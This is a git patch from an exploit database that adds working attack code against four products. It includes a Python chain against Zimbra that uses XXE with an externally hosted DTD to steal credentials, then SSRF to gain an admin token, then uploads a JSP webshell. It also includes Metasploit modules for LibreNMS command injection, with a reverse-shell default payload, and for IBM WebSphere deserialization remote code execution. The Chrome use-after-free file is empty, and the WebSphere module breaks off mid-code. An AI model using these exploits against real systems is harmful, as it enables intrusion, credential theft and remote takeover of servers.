From e76aee5eaf30542e743dad3ef85e637b1957f3b8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 6 Jun 2019 05:01:56 +0000 Subject: [PATCH] DB: 2019-06-06 4 changes to exploits/shellcodes Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit) LibreNMS - addhost Command Injection (Metasploit) Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery --- exploits/jsp/webapps/46967.py | 107 +++++ exploits/linux/remote/46970.rb | 163 ++++++++ exploits/multiple/dos/46968.html | 75 ++++ exploits/windows/remote/46969.rb | 650 +++++++++++++++++++++++++++++++ files_exploits.csv | 4 + 5 files changed, 999 insertions(+) create mode 100755 exploits/jsp/webapps/46967.py create mode 100755 exploits/linux/remote/46970.rb create mode 100644 exploits/multiple/dos/46968.html create mode 100755 exploits/windows/remote/46969.rb diff --git a/exploits/jsp/webapps/46967.py b/exploits/jsp/webapps/46967.py new file mode 100755 index 000000000..7ed085ce6 --- /dev/null +++ b/exploits/jsp/webapps/46967.py @@ -0,0 +1,107 @@ +#coding=utf8 +import requests +import sys +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +base_url=sys.argv[1] +base_url=base_url.rstrip("/") +#upload file name and content +#modify by k8gege +#Connect "shell.jsp" using K8fly CmdShell +#Because the CMD parameter is encrypted using Base64(bypass WAF) +filename = "shell.jsp" +fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>' +print(base_url) +#dtd file url +dtd_url="https://k8gege.github.io/zimbra.dtd" +""" + + +"> +"> +""" +xxe_data = r""" + %dtd; + %all; + ]> + + + aaaaa + &fileContents; + +""".format(dtd=dtd_url) + +#XXE stage +headers = { + "Content-Type":"application/xml" +} +print("[*] Get User Name/Password By XXE ") +r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15) +#print r.text +if 'response schema not available' not in r.text: + print("have no xxe") + exit() + +#low_token Stage +import re +pattern_name = re.compile(r"\n.*?(.*?)<\/value>") +pattern_password = re.compile(r"\n.*?(.*?)<\/value>") +username = pattern_name.findall(r.text)[0][2] +password = pattern_password.findall(r.text)[0][2] +print(username) +print(password) + +auth_body=""" + + + + + + + + {username} + {password} + + + +""" +print("[*] Get Low Privilege Auth Token") +r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False) + +pattern_auth_token=re.compile(r"(.*?)") + +low_priv_token = pattern_auth_token.findall(r.text)[0] + +#print(low_priv_token) + +# SSRF+Get Admin_Token Stage + +headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";" +headers["Host"]="foo:7071" +print("[*] Get Admin Auth Token By SSRF") +r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False) + +admin_token =pattern_auth_token.findall(r.text)[0] +#print("ADMIN_TOKEN:"+admin_token) + +f = { + 'filename1':(None,"whocare",None), + 'clientFile':(filename,fileContent,"text/plain"), + 'requestId':(None,"12",None), +} + +headers ={ + "Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";" +} +print("[*] Uploading file") +r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False) +#print(r.text) +print("Shell: "+base_url+"/downloads/"+filename) +#print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)") +print("[*] Request Result:") +s = requests.session() +r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers) +#print(r.text) +print("May need cookie:") +print(headers['Cookie']) \ No newline at end of file diff --git a/exploits/linux/remote/46970.rb b/exploits/linux/remote/46970.rb new file mode 100755 index 000000000..c9c305baf --- /dev/null +++ b/exploits/linux/remote/46970.rb @@ -0,0 +1,163 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'LibreNMS addhost Command Injection', + 'Description' => %q( + This module exploits a command injection vulnerability in the open source + network management software known as LibreNMS. The community parameter used + in a POST request to the addhost functionality is unsanitized. This parameter + is later used as part of a shell command that gets passed to the popen function + in capture.inc.php, which can result in execution of arbitrary code. + + This module requires authentication to LibreNMS first. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mhaskar', # Vulnerability discovery and PoC + 'Shelby Pace' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2018-20434' ], + [ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ], + [ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ] + ], + 'Arch' => ARCH_CMD, + 'Targets' => + [ + [ 'Linux', + { + 'Platform' => 'unix', + 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' } + } + ] + ], + 'DisclosureDate' => '2018-12-16', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]), + OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]), + OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]) + ]) + end + + def login + login_uri = normalize_uri(target_uri.path, 'login') + res = send_request_cgi('method' => 'GET', 'uri' => login_uri) + fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200 + + cookies = res.get_cookies + + login_res = send_request_cgi( + 'method' => 'POST', + 'uri' => login_uri, + 'cookie' => cookies, + 'vars_post' => + { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ) + + fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302 + + cookies = login_res.get_cookies + res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookies) + fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices') + + print_status('Successfully logged into LibreNMS. Storing credentials...') + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + login_res.get_cookies + end + + def add_device(cookies) + add_uri = normalize_uri(target_uri.path, 'addhost') + @hostname = Rex::Text.rand_text_alpha(6...12) + comm_payload = "'; #{payload.encoded}#'" + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => add_uri, + 'cookie' => cookies, + 'vars_post' => + { + 'snmp' => 'on', + 'force_add' => 'on', + 'snmpver' => 'v2c', + 'hostname' => @hostname, + 'community' => comm_payload, + 'authalgo' => 'MD5', + 'cryptoalgo' => 'AES', + 'transport' => 'udp', + 'port_assoc_mode' => 'ifIndex' + } + ) + + fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added') + print_good("Successfully added device with hostname #{@hostname}") + + host_id = res.get_html_document.search('div[@class="alert alert-success"]/a[@href]').text + fail_with(Failure::NotFound, "Couldn't retrieve the id for the device") if host_id.empty? + host_id = host_id.match(/(\d+)/).nil? ? nil : host_id.match(/(\d+)/) + + fail_with(Failure::NotFound, 'Failed to retrieve a valid device id') if host_id.nil? + + host_id + end + + def del_device(id, cookies) + del_uri = normalize_uri(target_uri.path, 'delhost') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => del_uri, + 'cookie' => cookies, + 'vars_post' => + { + 'id' => id, + 'confirm' => 1 + } + ) + + print_status('Unsure if device was deleted. No response received') unless res + + if res.body.include?("Removed device #{@hostname.downcase}") + print_good("Successfully deleted device with hostname #{@hostname} and id ##{id}") + else + print_status('Failed to delete device. Manual deletion may be needed') + end + end + + def exploit + exp_uri = normalize_uri(target_uri.path, 'ajax_output.php') + cookies = login + + host_id = add_device(cookies) + send_request_cgi( + 'method' => 'GET', + 'uri' => exp_uri, + 'cookie' => cookies, + 'vars_get' => + { + 'id' => 'capture', + 'format' => 'text', + 'type' => 'snmpwalk', + 'hostname' => @hostname + } + ) + + del_device(host_id, cookies) + end +end \ No newline at end of file diff --git a/exploits/multiple/dos/46968.html b/exploits/multiple/dos/46968.html new file mode 100644 index 000000000..b906b3389 --- /dev/null +++ b/exploits/multiple/dos/46968.html @@ -0,0 +1,75 @@ + + + + + \ No newline at end of file diff --git a/exploits/windows/remote/46969.rb b/exploits/windows/remote/46969.rb new file mode 100755 index 000000000..a7053bdd9 --- /dev/null +++ b/exploits/windows/remote/46969.rb @@ -0,0 +1,650 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Powershell + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution', + 'Description' => %( + This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells. + NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author + ], + 'References' => + [ + ['CVE', '2019-8352'], + ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628'] + ], + 'Platform' => ['win'], + 'Targets' => + [ + [ + 'Windows Binary', { + 'Arch' => [ARCH_X86, ARCH_X64], + 'Platform' => 'win' + } + ], + [ + 'CMD', { + 'Arch' => ARCH_CMD, + 'Platform' => 'win', + 'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}} + } + ] + ], + 'Privileged' => true, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 15 2019')) + + register_options( + [ + Opt::RPORT(11006), # 11002,11004,11006,etc + OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), + OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']), + OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']), + OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL']) + ] + ) + end + + def cleanup + disconnect + print_status('Disconnected from IBM Websphere DMGR.') + super + end + + def exploit + command = nil + + if target.name == 'CMD' + fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD'] + command = datastore['CMD'] + end + # Connect to IBM Websphere Application Server + connect + print_status("Connected to IBM WAS DMGR.") + + node_port = datastore['RPORT'] + + # Send packet to add neighbor + enc_stream = construct_tcp_node_msg(node_port) + send_msg(enc_stream) + + sock.get_once + print_status('Server responded') + + # Generate binary name + bin_name = rand_text_alpha(8) + + if command + command = datastore['CMD'] + payload_contents = command.to_s + print_status('Executing command: ' + payload_contents) + bin_name << ".bat" + else + payload_contents = generate_payload_exe(code: payload.generate) + bin_name << ".exe" + end + + print_status("Sending payload: #{bin_name}") + enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name) + send_msg(enc_stream) + register_file_for_cleanup(bin_name) + end + + def send_msg(enc_stream) + pkt = [0x396fb74a].pack('N') + pkt += [enc_stream.length + 1].pack('N') + pkt += "\x00" + pkt += enc_stream + + # Send msg + sock.put(pkt) + end + + def construct_tcp_node_msg(node_port) + p2p_obj = Rex::Java::Serialization::Model::NewObject.new + p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new + p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj) + + # Create the obj + object = Rex::Java::Serialization::Model::NewObject.new + object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new + object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj) + + # Create the stream and add the object + stream = Rex::Java::Serialization::Model::Stream.new + stream.contents = [] + stream.contents << object + stream.contents << Rex::Java::Serialization::Model::EndBlockData.new + stream.contents << Rex::Java::Serialization::Model::NullReference.new + stream.encode + end + + def construct_bcast_task_msg(node_port, filename, byte_str, cmd) + # Add upload file argument + byte_arr = byte_str.unpack("C*") + upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd) + + # Create the obj + object = Rex::Java::Serialization::Model::NewObject.new + object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new + object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj) + + # Create the stream and add the object + stream = Rex::Java::Serialization::Model::Stream.new + stream.contents = [] + stream.contents << object + stream.encode + end + + def build_message(obj, msg_id, msg_type, orig_cell_field_type) + # Create the integer field and add the reference + id_field = Rex::Java::Serialization::Model::Field.new + id_field.type = 'int' + id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID') + + # Create the integer field and add the reference + type_field = Rex::Java::Serialization::Model::Field.new + type_field.type = 'int' + type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type') + + # Create the object field and add the reference + new_field = Rex::Java::Serialization::Model::Field.new + new_field.type = 'object' + new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell') + new_field.field_type = orig_cell_field_type + + # Create the class description + msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message') + msg_class_desc.serial_version = 1 + msg_class_desc.flags = 2 + msg_class_desc.fields = [] + msg_class_desc.fields << id_field + msg_class_desc.fields << type_field + msg_class_desc.fields << new_field + + # Add annotations + msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] + + # Add superclass + msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new + + # Set the member values + obj.class_data << ['int', msg_id] + obj.class_data << ['int', msg_type] + obj.class_data << Rex::Java::Serialization::Model::NullReference.new + + msg_class_desc + end + + def build_bcast_flood_msg(obj, msg_type, source_ip, source_port) + prng = Random.new + msg_id = prng.rand(4294967295) + + # Create the field ref + field_ref = Rex::Java::Serialization::Model::Reference.new + field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 + + msg_obj = build_message(obj, msg_id, msg_type, field_ref) + + # Create the integer field and add the reference + id_field = Rex::Java::Serialization::Model::Field.new + id_field.type = 'int' + id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID') + + # Create the integer field and add the reference + port_field = Rex::Java::Serialization::Model::Field.new + port_field.type = 'int' + port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort') + + # Create the object field and add the reference + ip_arr_field = Rex::Java::Serialization::Model::Field.new + ip_arr_field.type = 'array' + ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP') + ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B') + + # Create the class description + msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg') + msg_class_desc.serial_version = 1 + msg_class_desc.flags = 2 + msg_class_desc.fields = [] + msg_class_desc.fields << id_field + msg_class_desc.fields << port_field + msg_class_desc.fields << ip_arr_field + + # Add annotations + msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] + + # Add superclass + msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + msg_class_desc.super_class.description = msg_obj + + # Construct IP Array + ip_arr = source_ip.split(".").map(&:to_i) + builder = Rex::Java::Serialization::Builder.new + values_array = builder.new_array( + values_type: 'byte', + values: ip_arr, + name: '[B', + serial: 0x42acf317f8060854e0, + annotations: [Rex::Java::Serialization::Model::EndBlockData.new] + ) + + # Set the member values + obj.class_data << ['int', msg_id] + obj.class_data << ['int', source_port] + obj.class_data << values_array + + msg_class_desc + end + + def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj) + prng = Random.new + msg_id = prng.rand(4294967295) + + # Create the field type for the origCell + field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;") + msg_obj = build_message(obj, msg_id, msg_type, field_type) + + # Create the port field and add the reference + boot_time_field = Rex::Java::Serialization::Model::Field.new + boot_time_field.type = 'long' + boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime') + + # Create the port field and add the reference + tcp_port_field = Rex::Java::Serialization::Model::Field.new + tcp_port_field.type = 'int' + tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort') + + # Create the port field and add the reference + udp_port_field = Rex::Java::Serialization::Model::Field.new + udp_port_field.type = 'int' + udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort') + + # Create the object field and add the reference + ip_arr_field = Rex::Java::Serialization::Model::Field.new + ip_arr_field.type = 'array' + ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip') + ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B') + + # Create the task object field and add field_type + node_prop_field = Rex::Java::Serialization::Model::Field.new + node_prop_field.type = 'object' + node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty') + node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;") + + # Create the class description + msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage') + msg_class_desc.serial_version = 1 + msg_class_desc.flags = 2 + msg_class_desc.fields = [] + msg_class_desc.fields << boot_time_field + msg_class_desc.fields << tcp_port_field + msg_class_desc.fields << udp_port_field + msg_class_desc.fields << ip_arr_field + msg_class_desc.fields << node_prop_field + + # Add annotations + msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] + + # Add superclass + msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + msg_class_desc.super_class.description = msg_obj + + # Construct IP Array + ip_arr = source_ip.split(".").map(&:to_i) + builder = Rex::Java::Serialization::Builder.new + values_array = builder.new_array( + values_type: 'byte', + values: ip_arr, + name: '[B', + serial: 0x42acf317f8060854e0, + annotations: [Rex::Java::Serialization::Model::EndBlockData.new] + ) + + # Set the member values + obj.class_data << ['long', 0] + obj.class_data << ['int', source_port] + obj.class_data << ['int', source_port] + obj.class_data << values_array + obj.class_data << p2p_obj + + msg_class_desc + end + + def build_app_node_class(obj) + # Create the structured gateway field and add the reference + struct_bool_field = Rex::Java::Serialization::Model::Field.new + struct_bool_field.type = 'boolean' + struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway') + + # Create the version field and add the reference + version_field = Rex::Java::Serialization::Model::Field.new + version_field.type = 'int' + version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version') + + # Create the object field and add the reference + bridge_field = Rex::Java::Serialization::Model::Field.new + bridge_field.type = 'object' + bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList') + bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;') + + # Create the field ref + field_ref = Rex::Java::Serialization::Model::Reference.new + field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4 + + # Create the cellname field and add the reference + cellname_field = Rex::Java::Serialization::Model::Field.new + cellname_field.type = 'object' + cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName') + cellname_field.field_type = field_ref + + # Create the class description + msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty') + msg_class_desc.serial_version = 1 + msg_class_desc.flags = 2 + msg_class_desc.fields = [] + msg_class_desc.fields << struct_bool_field + msg_class_desc.fields << version_field + msg_class_desc.fields << bridge_field + msg_class_desc.fields << cellname_field + + # Add annotations + msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] + + # Add superclass + msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new + + # Set the member values + obj.class_data << ['boolean', 0] + obj.class_data << ['int', 0] + obj.class_data << Rex::Java::Serialization::Model::NullReference.new + obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name + + msg_class_desc + end + + def build_hashtable_class(obj) + # Create the integer field and add the reference + load_field = Rex::Java::Serialization::Model::Field.new + load_field.type = 'float' + load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor') + + # Create the integer field and add the reference + threshold_field = Rex::Java::Serialization::Model::Field.new + threshold_field.type = 'int' + threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold') + + # Create the class description + msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable') + msg_class_desc.serial_version = 0x13BB0F25214AE4B8 + msg_class_desc.flags = 3 + msg_class_desc.fields = [] + msg_class_desc.fields << load_field + msg_class_desc.fields << threshold_field + + # Add annotations + msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] + + # Add superclass + msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new + + obj.class_data << ['float', 0.75] + obj.class_data << ['int', 8] + obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03") + + msg_class_desc + end + + def build_properties_class + # Create the object + object = Rex::Java::Serialization::Model::NewObject.new + object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new + + msg_obj = build_hashtable_class(object) + + # Create the field ref + field_ref = Rex::Java::Serialization::Model::Reference.new + field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9 + + # Create the integer field and add the reference + defaults_field = Rex::Java::Serialization::Model::Field.new + defaults_field.type = 'object' + defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults') + defaults_field.field_type = field_ref + + # Create the class description + msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties') + msg_class_desc.serial_version = 0x3912D07A70363E98 + msg_class_desc.flags = 2 + msg_class_desc.fields = [] + msg_class_desc.fields << defaults_field + + # Add annotations + msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] + + # Add superclass + msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + msg_class_desc.super_class.description = msg_obj + + # Set the member values + object.class_desc.description = msg_class_desc + + object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName') + object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name + object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc') + object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0') + object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch') + object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s) + + object + end + + def build_p2p_node_class(obj) + msg_obj = build_app_node_class(obj) + + # Create the field ref + field_ref = Rex::Java::Serialization::Model::Reference.new + field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 + + # Create the data field and add the reference + data_field = Rex::Java::Serialization::Model::Field.new + data_field.type = 'array' + data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data') + data_field.field_type = field_ref + + # Create the object field and add the reference + prop_field = Rex::Java::Serialization::Model::Field.new + prop_field.type = 'object' + prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties') + prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;') + + # Create the class description + msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty') + msg_class_desc.serial_version = 2 + msg_class_desc.flags = 2 + msg_class_desc.fields = [] + msg_class_desc.fields << data_field + msg_class_desc.fields << prop_field + + # Add annotations + msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] + + # Add superclass + msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + msg_class_desc.super_class.description = msg_obj + + # Create the byte array ref + field_ref = Rex::Java::Serialization::Model::Reference.new + field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6 + + # Construct IP Array + byte_array = Rex::Java::Serialization::Model::NewArray.new + byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new + byte_array.array_description.description = field_ref + byte_array.type = "byte" + byte_array.values = [] + + # Set the member values + obj.class_data << byte_array + + # Add properties + obj.class_data << build_properties_class + + msg_class_desc + end + + def build_upfile_arg_class(filename, bytes, cmd) + # Create the field ref + field_ref = Rex::Java::Serialization::Model::Reference.new + field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 + + # Create the integer field and add the reference + filename_field = Rex::Java::Serialization::Model::Field.new + filename_field.type = 'object' + filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName') + filename_field.field_type = field_ref + + # Create the field ref + field_ref = Rex::Java::Serialization::Model::Reference.new + field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4 + + # Create the integer field and add the reference + filebody_field = Rex::Java::Serialization::Model::Field.new + filebody_field.type = 'array' + filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody') + filebody_field.field_type = field_ref + + # Create the field ref + field_ref = Rex::Java::Serialization::Model::Reference.new + field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 + + # Create the object field and add the reference + post_cmd_field = Rex::Java::Serialization::Model::Field.new + post_cmd_field.type = 'object' + post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd') + post_cmd_field.field_type = field_ref + + # Create the class description + msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument') + msg_class_desc.serial_version = 1 + msg_class_desc.flags = 2 + msg_class_desc.fields = [] + msg_class_desc.fields << filebody_field + msg_class_desc.fields << filename_field + msg_class_desc.fields << post_cmd_field + + # Add annotations + msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] + + # Add superclass + msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new + + # Create the byte array ref + field_ref = Rex::Java::Serialization::Model::Reference.new + field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7 + + # Construct IP Array + byte_array = Rex::Java::Serialization::Model::NewArray.new + byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new + byte_array.array_description.description = field_ref + byte_array.type = "byte" + byte_array.values = bytes + + # Set the member values + object = Rex::Java::Serialization::Model::NewObject.new + object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new + object.class_desc.description = msg_class_desc + object.class_data << byte_array + object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename) + object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd) + + object + end + + def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj) + msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port) + + # Create the integer field and add the reference + out_int_field = Rex::Java::Serialization::Model::Field.new + out_int_field.type = 'int' + out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval') + + # Create the task object field and add field_type + task_field = Rex::Java::Serialization::Model::Field.new + task_field.type = 'object' + task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task') + task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;") + + # Create the task object field and add field_type + task_arg_field = Rex::Java::Serialization::Model::Field.new + task_arg_field.type = 'object' + task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument') + task_arg_field.field_type = 